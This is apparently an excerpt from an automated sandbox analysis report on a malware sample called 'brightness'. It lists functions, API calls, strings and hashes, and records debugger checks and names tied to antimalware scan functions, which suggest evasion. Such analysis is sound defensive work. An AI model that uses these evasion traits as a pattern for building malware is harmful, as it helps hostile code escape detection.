                                                                                                                                            • Opcode Fuzzy Hash: 8aaaa9463fb1f7724fabdff3082ad2239fc1caf5697e65a67c2963e7106fe22a
                                                                                                                                            • Instruction Fuzzy Hash: 8641E07070421A4BD713BB7888A87FFB3EBDF86300B644526D462D7746EA38DD06CA25
                                                                                                                                            Function 027C8018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc
                                                                                                                                            • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                            • API String ID: 1883125708-1952140341
                                                                                                                                            • Opcode ID: c607ac25bfde815a084bbfbdbb4cb8a892fd4c19d9520fbdc62e707d8095ed09
                                                                                                                                            • Instruction ID: 142dcae0e049d2cc560eeedc7bc31212b2e22fd6dca43480acc15c6983863e8a
                                                                                                                                            • Opcode Fuzzy Hash: c607ac25bfde815a084bbfbdbb4cb8a892fd4c19d9520fbdc62e707d8095ed09
                                                                                                                                            • Instruction Fuzzy Hash: D2F09674640314AFE703EFB4DC65A9EB7ADFF49710B610528F900D3650D670AD509A22
                                                                                                                                            Function 027CEFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(KernelBase,?,027CF3CC,UacInitialize,0281237C,027DB40C,UacScan,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString), ref: 027CEFCE
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027CEFE0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                            • API String ID: 1646373207-2367923768
                                                                                                                                            • Opcode ID: a9d03487e6341f907b52b9b8cb7337fb9049f4b129cd7204c677be7c12ae0eba
                                                                                                                                            • Instruction ID: 9c21aa25a07eb67f6b9e3dee924ce448be8f3d6a2140eb62e8d2c8b4f7eaa8f5
                                                                                                                                            • Opcode Fuzzy Hash: a9d03487e6341f907b52b9b8cb7337fb9049f4b129cd7204c677be7c12ae0eba
                                                                                                                                            • Instruction Fuzzy Hash: 3CD012A27557601EB50136F81CC895D028D894663D7300E2DF122D50D2E567C8512110
                                                                                                                                            Function 027BC3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,027DD10B,00000000,027DD11E), ref: 027BC3FA
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027BC40B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                            • API String ID: 1646373207-3712701948
                                                                                                                                            • Opcode ID: 3c937c09e3e8f17baea6f5fd717bc698a70bead2e56cac33512904a7e68ac521
                                                                                                                                            • Instruction ID: a0c5c6822c9847e1b9f43f61410e938cc008f42121b2b29a909c356647d2816e
                                                                                                                                            • Opcode Fuzzy Hash: 3c937c09e3e8f17baea6f5fd717bc698a70bead2e56cac33512904a7e68ac521
                                                                                                                                            • Instruction Fuzzy Hash: BFD09EA1E813015FF7036BB1688A7B62EA99F45349B40E83EE1419D101D77195144F54
                                                                                                                                            Function 027BE168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027BE217
                                                                                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027BE233
                                                                                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027BE2AA
                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 027BE2D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 920484758-0
                                                                                                                                            • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                            • Instruction ID: 09c4935b86d01c1986e1900d8d1edb1cd8da489e6c6b30533e7d31530bface43
                                                                                                                                            • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                            • Instruction Fuzzy Hash: 3341D575A0162D9FCB63DB58CC98BDAB3BDAF49214F4041E5E649E7311DA34AF808F60
                                                                                                                                            Function 027BACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027BACD9
                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027BACFD
                                                                                                                                            • GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027BAD18
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027BADAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                            • Opcode ID: 8e9983873a571d168fe2e7bb29e6666cb9600419f03b261459e9c0e1b586ec6b
                                                                                                                                            • Instruction ID: 430f0a8c1dd1c98ecaeaeb3f975e9a9f80a941e466bd30a5454517b39cc4bdcb
                                                                                                                                            • Opcode Fuzzy Hash: 8e9983873a571d168fe2e7bb29e6666cb9600419f03b261459e9c0e1b586ec6b
                                                                                                                                            • Instruction Fuzzy Hash: 8A412B75E002589BDB23EB68CC88BDAB7FDAF08300F0040E9A648E7245DB749F848F51
                                                                                                                                            Function 027BACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027BACD9
                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027BACFD
                                                                                                                                            • GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027BAD18
                                                                                                                                            • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027BADAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                            • Opcode ID: 3e5c8a2ecd6c24c709dd1c86a486e26a14dc2039c115dcf73ce7f1a038911fd7
                                                                                                                                            • Instruction ID: 5a05057bf166e2ab727364066cf6ec6b4a9e43a88ba4ebfc85e4deadf2118c2c
                                                                                                                                            • Opcode Fuzzy Hash: 3e5c8a2ecd6c24c709dd1c86a486e26a14dc2039c115dcf73ce7f1a038911fd7
                                                                                                                                            • Instruction Fuzzy Hash: 6F412C74E402589BDB23EB68CC88BDAB7FDAF08305F0440E9A648E7255DB749F848F55
                                                                                                                                            Function 027B1C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 59ba1cf03f9f76a74163ee338d186b7fd030db5a5837c21447be939af9e8f14a
                                                                                                                                            • Instruction ID: 9de5ae50af4562780c575055fa428a8bc8d8bfd5f993830c4a67399e220be588
                                                                                                                                            • Opcode Fuzzy Hash: 59ba1cf03f9f76a74163ee338d186b7fd030db5a5837c21447be939af9e8f14a
                                                                                                                                            • Instruction Fuzzy Hash: 64A117667116000BD71BAA7C9CA83EDB3C2DFC5325FA8827EE11DCB7C5EB64C9418650
                                                                                                                                            Function 027B946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,027B955A), ref: 027B94F2
                                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,027B955A), ref: 027B94F8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                                            • String ID: yyyy
                                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                                            • Opcode ID: 8cd03cbe7a3b59a84a4359a602ad079785053b5339ee0f1813d819b2e8948373
                                                                                                                                            • Instruction ID: 7e934994285b4c4d2213fe0aa866c4cc00b397a2c8e0a58f4911f7dce8943e51
                                                                                                                                            • Opcode Fuzzy Hash: 8cd03cbe7a3b59a84a4359a602ad079785053b5339ee0f1813d819b2e8948373
                                                                                                                                            • Instruction Fuzzy Hash: FF217C71A402289FDB13DFA8C865BEEB3B9EF08710F5100A5EA45E7291D634EE00CF61
                                                                                                                                            Function 027C8184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027C8088,?,?,00000000,?,027C79FE,ntdll,00000000,00000000,027C7A43,?,?,00000000), ref: 027C8056
                                                                                                                                              • Part of subcall function 027C8018: GetModuleHandleA.KERNELBASE(?), ref: 027C806A
                                                                                                                                              • Part of subcall function 027C80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027C8148,?,?,00000000,00000000,?,027C8061,00000000,KernelBASE,00000000,00000000,027C8088), ref: 027C810D
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027C8113
                                                                                                                                              • Part of subcall function 027C80C0: GetProcAddress.KERNEL32(?,?), ref: 027C8125
                                                                                                                                            • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027C820E), ref: 027C81F0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                            • String ID: FlushInstructionCache$Kernel32
                                                                                                                                            • API String ID: 3811539418-184458249
                                                                                                                                            • Opcode ID: f346d1a0cfca150a870595e22f37064e239dbf162cdcc3788c292a8ac99ea754
                                                                                                                                            • Instruction ID: 1cfb061be0bc378f353fc4f380e080253ba149d30ed111d2810043789b2e1636
                                                                                                                                            • Opcode Fuzzy Hash: f346d1a0cfca150a870595e22f37064e239dbf162cdcc3788c292a8ac99ea754
                                                                                                                                            • Instruction Fuzzy Hash: D101AD79640644AFE703EFA4DC69F9B77EDEB48B10F614868B900C32A4D630AD108B22
                                                                                                                                            Function 027CAD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CAD90
                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004), ref: 027CADC0
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000008), ref: 027CADDF
                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 027CADEB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Read$Write
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3448952669-0
                                                                                                                                            • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                            • Instruction ID: 9deca22b1b18740c2ccd779eb9e34647498aa3bc091b75077eea60d711aa7036
                                                                                                                                            • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                                                                                                                                            • Instruction Fuzzy Hash: 5021AFB1A4021D9BDB11DF7ACC81BAE73A9EF40326F108119EE5097384EB34E9119BE0

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:8%
                                                                                                                                            Dynamic/Decrypted Code Coverage:68%
                                                                                                                                            Signature Coverage:10.5%
                                                                                                                                            Total number of Nodes:676
                                                                                                                                            Total number of Limit Nodes:53
                                                                                                                                            execution_graph 85052 1f26d044 85053 1f26d05c 85052->85053 85054 1f26d0b6 85053->85054 85062 2525b640 85053->85062 85070 2525f094 85053->85070 85081 2525b4c9 85053->85081 85087 2525b4d8 85053->85087 85093 2525adfc 85053->85093 85097 2525ae0c 85053->85097 85108 2525ade1 85053->85108 85063 2525b64d 85062->85063 85064 2525b650 85063->85064 85067 2525b675 85063->85067 85120 2525ae34 85064->85120 85066 2525b657 85066->85054 85069 2525b71f 85067->85069 85124 25258fb4 85067->85124 85073 2525f0a0 85070->85073 85071 2525f101 85075 2525f0ff 85071->85075 85154 2525e4a4 85071->85154 85073->85071 85074 2525f0f1 85073->85074 85074->85075 85128 25b980c8 85074->85128 85133 2525f218 85074->85133 85138 25b981a4 85074->85138 85144 2525f228 85074->85144 85149 25b980d8 85074->85149 85075->85075 85082 2525b4d8 85081->85082 85083 2525adfc GetModuleHandleW 85082->85083 85084 2525b50a 85083->85084 85085 2525ae0c 2 API calls 85084->85085 85086 2525b51f 85085->85086 85086->85054 85088 2525b4fe 85087->85088 85089 2525adfc GetModuleHandleW 85088->85089 85090 2525b50a 85089->85090 85091 2525ae0c 2 API calls 85090->85091 85092 2525b51f 85091->85092 85092->85054 85094 2525ae07 85093->85094 85095 2525ae34 GetModuleHandleW 85094->85095 85096 2525b657 85095->85096 85096->85054 85098 2525ae17 85097->85098 85099 2525f101 85098->85099 85101 2525f0f1 85098->85101 85100 2525e4a4 2 API calls 85099->85100 85102 2525f0ff 85099->85102 85100->85102 85101->85102 85103 25b980d8 2 API calls 85101->85103 85104 25b980c8 2 API calls 85101->85104 85105 25b981a4 2 API calls 85101->85105 85106 2525f228 2 API calls 85101->85106 85107 2525f218 2 API calls 85101->85107 85103->85102 85104->85102 85105->85102 85106->85102 85107->85102 85109 2525ad5e 85108->85109 85112 2525adfb 85108->85112 85109->85054 85110 2525f101 85111 2525e4a4 2 API calls 85110->85111 85114 2525f0ff 85110->85114 85111->85114 85112->85110 85113 2525f0f1 85112->85113 85113->85114 85115 25b980d8 2 API calls 85113->85115 85116 25b980c8 2 API calls 85113->85116 85117 25b981a4 2 API calls 85113->85117 85118 2525f228 2 API calls 85113->85118 85119 2525f218 2 API calls 85113->85119 85114->85114 85115->85114 85116->85114 85117->85114 85118->85114 85119->85114 85121 2525ae3f 85120->85121 85122 25258fb4 GetModuleHandleW 85121->85122 85123 2525b71f 85121->85123 85122->85123 85125 2525a5e0 GetModuleHandleW 85124->85125 85127 2525a684 85125->85127 85127->85069 85130 25b980d8 85128->85130 85129 25b98178 85129->85075 85161 25b98190 85130->85161 85164 25b98183 85130->85164 85134 2525f228 85133->85134 85135 2525f23e 85134->85135 85136 2525e4a4 2 API calls 85134->85136 85135->85075 85137 2525f27c 85136->85137 85137->85075 85139 25b981b2 85138->85139 85140 25b98162 85138->85140 85142 25b98190 2 API calls 85140->85142 85143 25b98183 2 API calls 85140->85143 85141 25b98178 85141->85075 85142->85141 85143->85141 85145 2525f236 85144->85145 85146 2525f23e 85145->85146 85147 2525e4a4 2 API calls 85145->85147 85146->85075 85148 2525f27c 85147->85148 85148->85075 85151 25b980ec 85149->85151 85150 25b98178 85150->85075 85152 25b98190 2 API calls 85151->85152 85153 25b98183 2 API calls 85151->85153 85152->85150 85153->85150 85155 2525e4af 85154->85155 85156 2525f2d2 85155->85156 85157 2525f37c 85155->85157 85159 2525f32a CallWindowProcW 85156->85159 85160 2525f2d9 85156->85160 85158 2525ae0c CallWindowProcW 85157->85158 85158->85160 85159->85160 85160->85075 85163 25b981a1 85161->85163 85167 25b995c9 85161->85167 85163->85129 85165 25b981a1 85164->85165 85166 25b995c9 2 API calls 85164->85166 85165->85129 85166->85165 85169 2525e4a4 2 API calls 85167->85169 85171 2525f280 85167->85171 85168 25b995da 85168->85163 85169->85168 85172 2525f290 85171->85172 85173 2525f2d2 85172->85173 85174 2525f37c 85172->85174 85176 2525f32a CallWindowProcW 85173->85176 85177 2525f2d9 85173->85177 85175 2525ae0c CallWindowProcW 85174->85175 85175->85177 85176->85177 85177->85168 85178 20e50e90 85179 20e50e9c 85178->85179 85181 20e50ea7 85179->85181 85182 20e54794 85179->85182 85185 20e5ed48 85182->85185 85186 20e5ed6f 85185->85186 85189 20e5ee60 85186->85189 85190 20e5eea9 VirtualProtect 85189->85190 85192 20e547b6 85190->85192 85193 2525dd90 85194 2525ddd6 GetCurrentProcess 85193->85194 85196 2525de21 85194->85196 85197 2525de28 GetCurrentThread 85194->85197 85196->85197 85198 2525de65 GetCurrentProcess 85197->85198 85199 2525de5e 85197->85199 85200 2525de9b 85198->85200 85199->85198 85201 2525dec3 GetCurrentThreadId 85200->85201 85202 2525def4 85201->85202 85203 25255bd0 85204 25255bdf 85203->85204 85207 25255be9 85203->85207 85211 25255bf8 85203->85211 85209 25255c26 85207->85209 85208 25255cb1 85208->85208 85209->85208 85215 25253e6c 85209->85215 85213 25255c26 85211->85213 85212 25255cb1 85213->85212 85214 25253e6c 5 API calls 85213->85214 85214->85212 85216 25253e77 85215->85216 85220 25259130 85216->85220 85221 25258c60 85216->85221 85220->85208 85223 25258c6b 85221->85223 85222 252590f7 85222->85220 85226 25258c70 85222->85226 85223->85222 85229 25259b50 85223->85229 85237 25259b60 85223->85237 85227 2525f530 SetTimer 85226->85227 85228 2525f5dd 85227->85228 85228->85220 85230 25259b60 85229->85230 85245 2525a134 85230->85245 85232 25258fb4 GetModuleHandleW 85233 25259c7e 85232->85233 85234 25259c3a 85233->85234 85251 2525b234 85233->85251 85238 25259b8b 85237->85238 85244 2525a134 3 API calls 85238->85244 85239 25259c0e 85240 25258fb4 GetModuleHandleW 85239->85240 85242 25259c3a 85239->85242 85241 25259c7e 85240->85241 85241->85242 85243 2525b234 CreateWindowExW 85241->85243 85243->85242 85244->85239 85246 25259c0e 85245->85246 85247 2525a13f 85245->85247 85246->85232 85246->85234 85248 2525a1ee 85247->85248 85256 2525a2a0 85247->85256 85269 2525a2b0 85247->85269 85252 2525b1ca 85251->85252 85253 2525b23f CreateWindowExW 85251->85253 85252->85234 85255 2525b416 85253->85255 85257 2525a2b0 85256->85257 85258 25258fb4 GetModuleHandleW 85257->85258 85260 2525a2e9 85257->85260 85258->85260 85259 2525a4a5 85262 2525a500 85259->85262 85263 2525a645 GetModuleHandleW 85259->85263 85260->85259 85261 25258fb4 GetModuleHandleW 85260->85261 85264 2525a42b 85261->85264 85262->85248 85265 2525a684 85263->85265 85264->85259 85264->85262 85266 25258fb4 GetModuleHandleW 85264->85266 85265->85248 85267 2525a479 85266->85267 85267->85259 85268 25258fb4 GetModuleHandleW 85267->85268 85268->85259 85270 2525a2c5 85269->85270 85271 25258fb4 GetModuleHandleW 85270->85271 85272 2525a2e9 85270->85272 85271->85272 85273 25258fb4 GetModuleHandleW 85272->85273 85276 2525a4a5 85272->85276 85275 2525a42b 85273->85275 85274 2525a500 85274->85248 85275->85274 85275->85276 85279 25258fb4 GetModuleHandleW 85275->85279 85276->85274 85277 2525a645 GetModuleHandleW 85276->85277 85278 2525a684 85277->85278 85278->85248 85280 2525a479 85279->85280 85280->85276 85281 25258fb4 GetModuleHandleW 85280->85281 85281->85276 85282 2525f630 85283 2525f65d 85282->85283 85284 2525f6ac 85283->85284 85286 2525e4fc 85283->85286 85284->85284 85287 2525e507 85286->85287 85288 25253e6c 5 API calls 85287->85288 85289 2525f815 85288->85289 85289->85284 85290 20e5f130 85291 20e5f174 CloseHandle 